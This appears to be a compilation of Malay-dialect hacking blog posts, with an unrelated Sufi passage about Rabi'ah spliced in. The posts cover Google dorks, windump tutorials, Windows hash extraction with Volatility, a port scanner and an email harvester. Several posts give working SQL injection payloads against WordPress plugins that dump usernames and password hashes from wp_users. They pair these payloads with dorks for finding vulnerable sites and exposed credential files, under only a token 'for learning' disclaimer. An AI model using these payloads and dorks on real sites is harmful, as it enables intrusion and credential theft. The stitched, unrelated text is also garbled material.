Berikut adolah senarai istilah yang biaso kito akan jumpo dalam proses buffer overflow

Register
Dalam computer architecture, processor register adalah storage kecil yang terdapat pado CPU, yang mano kandungannya boleh dicapai dengan lobih pantas berbanding storan yang lain. Secaro amnya, resiter ini tidak dianggap sebahagian daripado memory biaso PC.

Register berado di eteh memory hierarchy.

API
API (Application Programming Interface) adolah sebahagian rule dan spesifikasi yang mano program bulih gunokan untuk berhubung sesamo mereka. API bertindak sebagai interface antaro software programs dan membantu proses interaksi, lebih kurang macam user interface membantu interaksi antaro pengguna(manusia) dan komputer.

Assembly Language
Assembly Language adolah low level programming language untuk komputer, microprosessors,
microcontrollers dan device-device lain. Cakap mudah eh, assembly ni adolah bahaso mesin.

Assembly Language ni berbezo berdasarkan architechure computer.

Contoh code:
ghimau.asm
<br>section .text<br> global _start <br><br>_start: <br><br> mov edx,len <br> mov ecx,msg <br> mov ebx,1 <br> mov eax,4 <br> int 0x80 <br><br> mov eax,1 <br> int 0x80 <br><br>section .data<br><br>msg db 'ghimau r0x!',0xa <br>len equ $ - msg <br>

Untuk compile dan run, gunokan command kek bawah ni.
<br>nasm -f elf ghimau.asm<br>ld -s -o ghimau ghimau.o<br>./ghimau<br>


Nanti bersambung lagi untuk siri yang kedua. Insya ALLAH :)

Google dork untuk hari ni. Maklumat yang diaparkan adalah untuk tujuan pembelajaran sahajo. Sebarang penyalahgunaan maklumat adolah eteh tanggungjawap anda sendiri.

<br>inurl:loader-wizard ext:php<br>inurl:sarg inurl:siteuser.html<br>inurl:/install/install.php intitle:vBulletin * Install System<br>

Rabi’ah, meskipun seorang wanita, namun merupakan mahkota laki-laki. Sekali ia mempergunakan waktunya delapan tahun untuk pergi haji ke Ka,bah dengan mengingsutkan panjang badannya di tanah. Ketika akhirnya ia sampai ke pintu rumah suci itu, ia berpikir, “Kini akhirnya telah kutunaikan kewajibanku.” Pada hari suci ketika ia hendak menghadapkan diri ke Ka’bah, perempuan-perempuan pengiringnya meninggalkannya. Maka Rabi’ah pun menyelusuri jejaknya semula dan berkata, “O Tuhan yang memiliki seri keagungan, delapan tahun lamanya hamba telah mengukur jalan dengan panjang badan hamba, dan kini, ketika hari yang dirindukan itu telah tiba sebagai jawaban atas doa-doa hamba, Tuan letakkan duri-duri di jalan hamba!”

Untuk memahami arti peristiwa demikian perlu pula mengetahui seorang pencinta Tuhan seperti Rabi’ah itu. Selama kau terapung-apung di lautan dunia yang dalam, ombak-ombaknya akan menerima dan menolakmu berganti-ganti. Kadang-kadang kau akan diperkenankan sampai ke Ka’bah, kadang-kadang pula kau akan menarik nafas panjang (karena kecewa) berada di sebuah kuil. Jika kau berhasil menarik diri dari keterikatan dengan dunia ini, kau akan menikmati kebahagiaan; tetapi jika kau tinggal terikat, kepalamu akan berpusing-pusing bagai batu giling pada perkakas penggiling. Tidak sejenak pun kau akan tenang; kau akan terganggu oleh seekor nyamuk saja pun.

Ok, kali ni den nak kongsi teknik forensic untuk dapatkan password dan windows password hash dari physical memory.

Macam yang kita ketahui, benda-benda ni disimpan dalam memory pc kita. Teknik yang sama digunakan oleh ahli forensics untuk menganalisa sekiranya ado malware yang reside dalam memory.

Ok, tanpa membuang maso. Mulo-mulo untuk dump memory ni, kito gunakan satu tools mdd
command yang kito gunakan adolah
<br>mdd_1.3.exe -o [nama_fail]<br>


Untuk tujuan memory analysis kito akan gunokan tools volatility

Gunokan command berikut untuk memaparkan senarai proses yang running.
<br>python volatility pslist -f [nama_image]<br>


Gunokan command berikut untuk melihat connections
<br>python volatility connscan -f [nama_image]<br>


Gunokan command berikut untuk mendapatkan maklumat am tentang image
<br>python volatility ident -f [nama_image]<br>


Gunokan command berikut untuk string dan offset. Untuk tujuan ni, kono download utllity strings.exe dari sysinternals
<br>strings.exe -a -o -n 5 [nama_image] > [nama_fail]<br>


Hasil dari langkah kek eteh tu, kito leh gunakan options string dalam volatility untuk carik string yang spesisifik

Ok.. kito nengok macam mano nak dapekkan password hash bagi windows logon Kito kono dapekkan hiveoffset dari memory image kito. Untuk ni kono ado module yang berkaitan dengan registry. Leh download kek sini :

http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip

Pastu gunokan command seperti kek bawah ni
<br>python volatility hivescan -f [nama_image]<br>


Gunakan command kek bawah ni. Amik nilai offset yang pertama pado step sebelumnya.
Gunakan nilai hex. Amik nilai offset bagi SAM dan system untuk langkah berikutnya
<br>python volatility hivelist -f [nama_image] -o [nilai_offset]<br>


Gunakan command kek bawah ni untuk dapatkan password hash. (Gunakan nilai offset
SAM dan system)
<br>python volatility hashdump -f [nama_image] -y 0xe1037b60 -s 0xe1c64b60<br>


Sotolah kito dapek hash file tersobut, kito bulihlah crack. Ado beberapo tools yang bulih digunakan untuk tujuan ni : SamInside, Ophcrack. Untuk tutorial ni den gunokan SamInside.


Sekian dulu untuk kali ni. Hehehe. :)

Huhuhu.. python memang jauh lagi simple dari c :)

<br>import socket<br>import struct<br><br>host = "vortex.labs.overthewire.org"<br>port = 5842<br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br><br>try:<br> s.connect((host, port))<br>except Exception:<br> print ("[+] Ralat! : Tidak dapat connect pada server")<br> <br>jumlah = 0<br>for n in range(4):<br> data = s.recv(4)<br> jumlah += struct.unpack("<I", data)[0] <br />s.send(struct.pack("<I", (jumlah & 0xFFFFFFFF))) <br />print s.recv(1000) s.close()<br />

Socket dalam python:



Baru tahu pasal struct :)

Salam.. ni den nak kongsi satu sql injection bug kek Satu component wordpress. Maklumat ini adolah untuk tujuan pembelajaran sahajo. Segalo penyalahgunaan maklumat adalah atas tanggungjawap anda sendiri :)

Ok.. ni google dork untuk mencari site yang vulnerable. Dork ni bulih diubahsuai untuk mendapatkan lobih banyak target.
<br>inurl:"wp-content/plugins/forum-server/feed.php"<br>

Dan ini adolah exploit code eh.
<br>feed.php?topic=1+union+select+group_concat(user_login,0x3a,user_pass)<br>+from+wp_users--<br>

Ni contoh POC target yang mempunyai kelemahan yang dinyatokan kek eteh tu.



Ni pulak adolah perl script yang den buek untuk extract maklumat dari kelemahan sqli

Apo bondo eh ni? Ni adolah satu tools untuk tujuan web authoring. Tools ini menggunokan konsep WYSIWYG. Dio ni macam dreamweaver la.. cumo loboh lightweight. Nak gunokan eh pun mudah.

Kalau berminat bulih lah layari laman web eh kek sini : http://kompozer.net/

Ni adolah antaramuko tool ni. Nampak mudah dan mesra pengguno.


Kek sini kito bulih nengok general setting.


Tools ni jugak membulihkan kito buek source code editing. Jadi bulihlah kito tambah atau ubahsuai mengikut citoraso kito :)


Kek sini kito bulih la membuat setting am untuk tujuan publishing dan lain-lain lagi.


Ok la yo. Kalau ado yang berminat nak gunokan tool ni bulihlah download, install dan cubo guno. Kalau ado masalah.. silo lah bertanya dalam ruangan komen. Insya ALLAH den akan bantu :)

Salam semuo. Apo khabar haghi ni.. Den nak sambung tutorial penggunaan tcpdump/windump siri yang ketigo.
Kot ado yang xpaham, leh la tanyo dan kongsi kek ruangan komen tu yo.

Tanpa membuang maso, kito nengok lak apo laie command-command yang bulih dibuek melalui tool ini.

Command 11 :
<br>windump -i [interface] port no_port<br>
untuk melihat trafic pado port yang dinyatokan.



Command 12 :
<br>windump -i [interface] src port no_port<br>
untuk melihat traffic dari sumber port yang dinyatokan



<br>windump -i [interface] dst port no_port<br>
untuk melihat traffic ke destinasi port yang dinyatokan


Command 13 :
<br>windump -i [interface] udp and src port 53<br>
untuk melihat traffic dns



Command 14 :
<br>windump -i [interface] portrange [no_port]-[no_port]<br>
untuk melihat traffic dari range port yang dinyatokan



Command 15 :
<br>windump -i [interface] less [byte]<br>
untuk melihat traffic yang lebih kecil dari byte yang dinyatokan



<br>windump -i [interface] greater [byte]<br>
untuk melihat traffic yang lebih besar dari byte yang dinyatokan


* Boleh juga guno format ni :
<br><<br><=<br>><br>>=<br>

Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 4 pulak :)
Ni adolah senarai command untuk post kali ni :
<br />windump -i [interface] port no_port<br />windump -i [interface] src port no_port<br />windump -i [interface] dst port no_port<br />windump -i [interface] udp and src port 53<br />windump -i [interface] portrange [no_port]-[no_port]<br />windump -i [interface] less [byte]<br />windump -i [interface] greater [byte]<br />

Salam semuo. Hari ni den nak kongsi beberapo google dork untuk korang cubo. Gunokan eteh tanggungjawap sendiri. Salah guno, sendiri tanggung yo :)

intitle:phpmyadmin inurl:server_processlist.php<br>Filetype: inc intext: mysql_connect<br>"parent directory" +proftpdpasswd<br>allintext:”Safe-mode: OFF (not secure)”<br>filetype:inc mysql_connect("localhost","root"<br>inurl:/phpmyadmin/scripts/setup.php<br>
So macam mano nak gunokan menatang ni? Hehehe.. copy salah satu dork kek eteh tu, dan masukkan kek ruangan google search. Pastu tokan la butang carian :)



Dan ini lah salah satu hasil dari carian menggunokan dork di eteh tu.

Salam, den nak kongsi script python simple untuk tujuan email harvesting dari web. Bolehlah korang kalau nak cubo script ni. Script ni simple yo, nanti ado maso den nak tambah fungsi proxy dan cek kalau ado redundant entry.

#!/usr/bin/env python<br>import urllib, re, os<br>os.system('cls')<br>print ' _ ___ _ '<br>print '(_:( ._. ):_) *********************************** '<br>print ' =(( ))= * simple email grabber | ghimau * '<br>print ' ( - ) *********************************** '<br>print<br><br>url = raw_input("Masukkan URL: ")<br>print<br>source = urllib.urlopen(url).read()<br>r = re.compile('(?<=href="mailto:).*?(?=")')<br>emails = r.findall(source)<br>print '-----------------'<br>print '[+] Senarai email'<br>print '-----------------'<br>print '\n'.join(emails)<br>

Salam semuo. Apo khabar haghi ni.. Den nak sambung tutorial penggunaan tcpdump/windump siri yang keduo.
Kot ado yang xpaham, leh la tanyo dan kongsi kek ruangan komen tu yo.

Tanpa membuang maso, kito nengok lak apo laie command-command yang bulih dibuek melalui tool ini.

Command 6 :
windump -i [interface] protocol<br>
protocol yang bulih digunokan sebagai filter adolah : tcp, udp dan icmp



Command 7 :
windump -i [interface] -nnvXs 1514 -c2 icmp<br>
-s untuk snaplength
-c untuk capture berapa bilangan packets



Command 8 :
windump -i [interface] host no_ip<br>
host : dapatkan traffic berdasarkan host ip yang disetkan



Command 9 :
windump -i [inteface] src no_ip<br>
src : dapatkan traffic berdasarkan source ip yang disetkan



windump -i [interface] dst no_ip<br>
dst : dapatkan traffic berdasarkan destination ip yang disetkan



Command 10 :
windump -i [interface] net x.x.x.0/24<br>
net untuk sniff keseluruhan subnet



Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 3 pulak :)
Ni adolah senarai command untuk post kali ni :
windump -i [interface] protocol<br />windump -i [interface] -nnvXs 1514 -c2 icmp<br />windump -i [interface] host no_ip<br />windump -i [inteface] src no_ip<br />windump -i [inteface] dst no_ip<br />windump -i [interface] net x.x.x.0/24<br />

Salam semuo. Hari ni den nak kongsi beberapo google dork untuk korang cubo. Gunokan eteh tanggungjawap sendiri. Salah guno, sendiri tanggung yo :)

<br>"error_log" inurl:/wp-content<br>filetype:xls password inurl:.com<br>filetype:ini "pdo_mysql" (pass|passwd|password|pwd)<br>filetype:ini "precurio" (pass|passwd|password|pwd)<br>filetype:ini "FtpInBackground" (pass|passwd|password|pwd)<br>filetype:ini "[FFFTP]" (pass|passwd|password|pwd)<br>inurl:"fbconnect_action=myhome"<br>

Dork yang last tu untuk cari kelemahan sqli pado component fbconnect dalam wp. Ni bug sql dio
<br>fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,<br>concat(user_login,0x3a,user_pass)<br>kambing,7,8,9,10,11,12+from+<br>wp_users--<br>

Salam semua. Den nak kongsi tutorial ringkas menggunakan tcpdump/windump. tcpdump adalah tool untuk tujuan packet sniffing. tcpdump merupakan satu tool yang berkesan dan komprehensif untuk tujuan network sniffing.

Berikut adalah option yang terdapat dalam tcpdump
<br>-i any : Listen on all interfaces just to see if you're seeing any traffic.<br>-n : Don't resolve hostnames.<br>-nn : Don't resolve hostnames or port names.<br>-X : Show the packet's contents in both hex and ASCII.<br>-XX : Same as -X, but also shows the ethernet header.<br>-v, -vv, -vvv : Increase the amount of packet information you get back.<br>-c : Only get x number of packets and then stop.<br>-S : Print absolute sequence numbers.<br>-e : Get the ethernet header as well.<br>-q : Show less protocol information.<br>-E : Decrypt IPSEC traffic by providing an encryption key.<br>-s : Set the snaplength, i.e. the amount of data that is being captured in bytes<br>-c : Only capture x number of packets, e.g. 'tcpdump -c 3'<br>

Ok .. tanpo membuang maso, kito teruskan kepado penggunaan tools ni. Untuk contoh ni den gunokan windump,
samo yo dengan tcpdump. By the way, jangan lupo untuk install winpcap dulu yo :)

Command 1 :
<br>windump -D<br>

Command ni untuk memaparkan senarai interface yang ado

Command 2 :
<br>windump -i [interface]<br>

command ni untuk memilih interface

Command 3:
<br>windump -i [interface] -nS<br>

ini merupokan command asas untuk sniffing.
-n untuk tidak resolve hostname, so orang payah skit la nak detect kito tongah sniff, dan proses sniffing pun lobih copek :)
-S untuk paparkan absolute sequence number

Command 4 :
<br>windump -i [interface] -nnvvS<br>

ini untuk hasil yang lobih verbose
-nn untuk tak resolve hostname dan port name
-vv untuk vebosity level

Command 5 :
<br>windump -i [interface] -nnvvXS<br>

ini untuk lebih ke dalam lagi :) deeper inspection
-X untuk memaparkan kandungan packet dalam format hex dan aschii

Ok.. setakat ni dulu yo untuk kali ni.. nanti ado maso kita sambung part 2 pulak :)
Ni adolah senarai command untuk post kali ni :
<br>windump -D<br>windump -i [interface]<br>windump -i [interface] -nS<br>windump -i [interface] -nnvvS<br>windump -i [interface] -nnvvXS<br>

Salam, den nak kongsi dengan korang semuo satu tools untuk membantu programmer membuek coding.

Ni tagline dari website diorang :
llumination Software Creator allows anyone to create their own software applications… without writing a single line of “code”.

Macam best kan. Hehehe.. dan dah cubo guno.. agak poning gak sobab documentation eh macam hampeh. By the way.. nak download software ni korang kene gi kat sini : http://radicalbreeze.com/

Untuk post ni den akan kongsi buek satu simple application guno pythongtk.

Ni adolah paparan untuk interface. Sonang yo nak buek interface eh.. drag and drop yo. Masalah sikit sebab documentation dia tak lengkap sangat. So kena pandai-pandailah nak explore.


Lopeh tu kito buek la logic flow eh. Kat sini ada beberap option, kalau nak buek aplikasi yang bosar dan banyak logic flow memang tak sesuai la nak guno tools ni.


Lopeh dah siap leh la test run aplikasi kito tu :) Nice... Menggukan teknik penipuan.. hehehe.. den hanyo parse command kepado nmap dan paparkan result dalam mesej box. Poning pakcik dongan gtk ni. Tapi tools ni memudahkan nak buek UI la.

Salam semua.. lamonya tak update blog ni yer. Hehehe.. Hmm.. nak buat mcm mana..bz sungguh skang ni. Nak2 si aiman ni dah makin nakal dah :)

Post kali ni den nak kongsi script python untuk buat port scanning asas, Layan...
<br>#!/usr/bin/env python<br>import os<br>from socket import * <br>sen_port = [21, 22, 25, 80, 3389, 3306]<br><br>if __name__ == '__main__':<br> os.system('cls')<br> print ' _ ___ _ '<br> print '(_:( ._. ):_) ************************************** '<br> print ' =(( ))= * simple tcp port scanner | ghimau * '<br> print ' ( - ) ************************************** '<br> print<br> target = raw_input('Masukkan target untuk scan: ')<br> print<br> targetIP = gethostbyname(target)<br> print '[+] Mula scan terhadap ip :', targetIP<br><br> for i in sen_port:<br> s = socket(AF_INET, SOCK_STREAM)<br><br> result = s.connect_ex((targetIP, i))<br><br> if(result == 0) :<br> print '[+] Port %d: BUKA' % (i,)<br> s.close()<br>
Dekat variable sen_port tu korang leh la tambahkan apa-apa nombor port lain. Kalai nak buat dia check semua port.. ubah sikit kat for loop tu.